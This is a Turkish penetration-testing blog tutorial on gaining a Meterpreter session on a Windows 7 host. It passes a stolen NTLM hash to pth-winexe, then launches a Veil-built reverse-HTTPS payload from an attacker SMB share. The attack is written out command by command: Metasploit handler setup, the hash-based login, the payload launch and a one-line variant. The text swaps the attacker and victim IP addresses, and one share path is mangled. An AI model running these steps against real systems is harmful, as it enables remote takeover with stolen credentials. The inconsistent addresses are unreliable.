Linux pth-winexe Aracı ile Erişim Sağlanan Windows Komut Satırından Meterpreter Komut Satırının Elde Edilmesi

Sızma testleri sırasında, bir şekilde elde edilen kimlik bilgileri (kullanıcı adı ve parola / parola özeti) kullanılarak Windows bilgisayarlara erişim sağlanmaya çalışılır. Bu yazıda erişim bilgileri (IP, kullanıcı adı ve parola / parola özeti) elde edilmiş bir Windows bilgisayara, Kali üzerindeki pth-winexe aracı ile Windows komut satırı ile bağlantı elde edilecek ve elde edilen bu Windows komut satırından da Meterpreter bağlantısı gerçekleştirilecektir.

Bu yazıda kullanılacak Kali bilgisayarın IP adresi 192.168.4.23, kurbana ait Windows 7 makinenin IP adresi ise 192.168.4.26 olduğu ve Windows 7 bilgisayarda yerel yönetici olan hesabın kullanıcı adının “Yonetici”, parolasının özeti ise “AAD3B435B51404EEAAD3B435B51404EE:47BF8039A8506CD67C524A03FF84BA4E” olarak tespit edildiğini varsayalım.Meterpreter komut satırı elde etmek için ve saldırgana ait Kali bilgisayara ters HTTPS Meterpreter bağlantısı kuracak olan zararlı bir uygulama dosyasının oluşturulduğunu varsayalım. Bu uygulama Linux pth-winexe aracına parametre olarak verilecek ve çalışması sağlanacaktır.

obtaining-meterpreter-session-by-using-obtained-authentication-informations-via-pth-winexe-tool-01

Kali sunucuda SAMBA sunucu uygulamasının yüklü olduğunu varsayalım. Kali bilgisayarda, “DosyaPaylasimi” adlı bir paylaşım dizinine herkes (everyone) için okuma ve yazma izni verilmiş olsun.

Oluşturulan uygulamanın gerçekleştireceği ters HTTPS Meterpreter bağlantısını dinleyecek olan MSF multi-handler istismar modülü aşağıdaki gibi ayarlanabilir.

use exploit/multi/handler
show options
set PAYLOAD windows/meterpreter/reverse_https
set ExitOnSession false
set LHOST 192.168.4.26
set LPORT 443
exploit -j -z

obtaining-meterpreter-session-by-using-obtained-authentication-informations-via-pth-winexe-tool-02

Kali pth-winexe aracına erişim bilgileri girilerek Windows komut satırı elde edilebilir.

pth-winexe -U WORKGROUP/Yonetici%AAD3B435B51404EEAAD3B435B51404EE:47BF8039A8506CD67C524A03FF84BA4E //192.168.4.23 cmd

obtaining-meterpreter-session-by-using-obtained-authentication-informations-via-pth-winexe-tool-03

Not: pth-winexe aracı yerine winexe aracı da kullanılabilir.

Artık, Windows komut satırında, Kali bilgisayarın SAMBA paylaşımındaki zararlı uygulama çalıştırılabilir.

start \192.168.4.26DosyaPaylasimiVeil_Meterpreter.exe

obtaining-meterpreter-session-by-using-obtained-authentication-informations-via-pth-winexe-tool-04

Böylece, MSF multi-handler istismar modülü üzerinde gelen talep yakalanmıştır.

obtaining-meterpreter-session-by-using-obtained-authentication-informations-via-pth-winexe-tool-05

Kullanıcının yetkileri ile istenilen komut çalıştırılabilmektedir.

sessions -i 1 -c “netstat -ano -p TCP”

obtaining-meterpreter-session-by-using-obtained-authentication-informations-via-pth-winexe-tool-06

İpucu: Windows komut satırına geçmeden paylaşımdaki uygulamayı çalıştırmak için aşağıdaki komut kullanılabilir.

pth-winexe -U WORKGROUP/Yonetici%AAD3B435B51404EEAAD3B435B51404EE:47BF8039A8506CD67C524A03FF84BA4E //192.168.4.23 “cmd /c start \\192.168.4.26\DosyaPaylasimi\Veil_Meterpreter.exe”

obtaining-meterpreter-session-by-using-obtained-authentication-informations-via-pth-winexe-tool-07

İpucu: Zararlı yazılım, herkesin erişim sağlayabileceği bir sunucuya (web sunucusu, dosya sunucusu gibi), saldırgana ait Windows paylaşımına veya Linux SAMBA paylaşımına (192.168.4.26) da konulabilir.

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.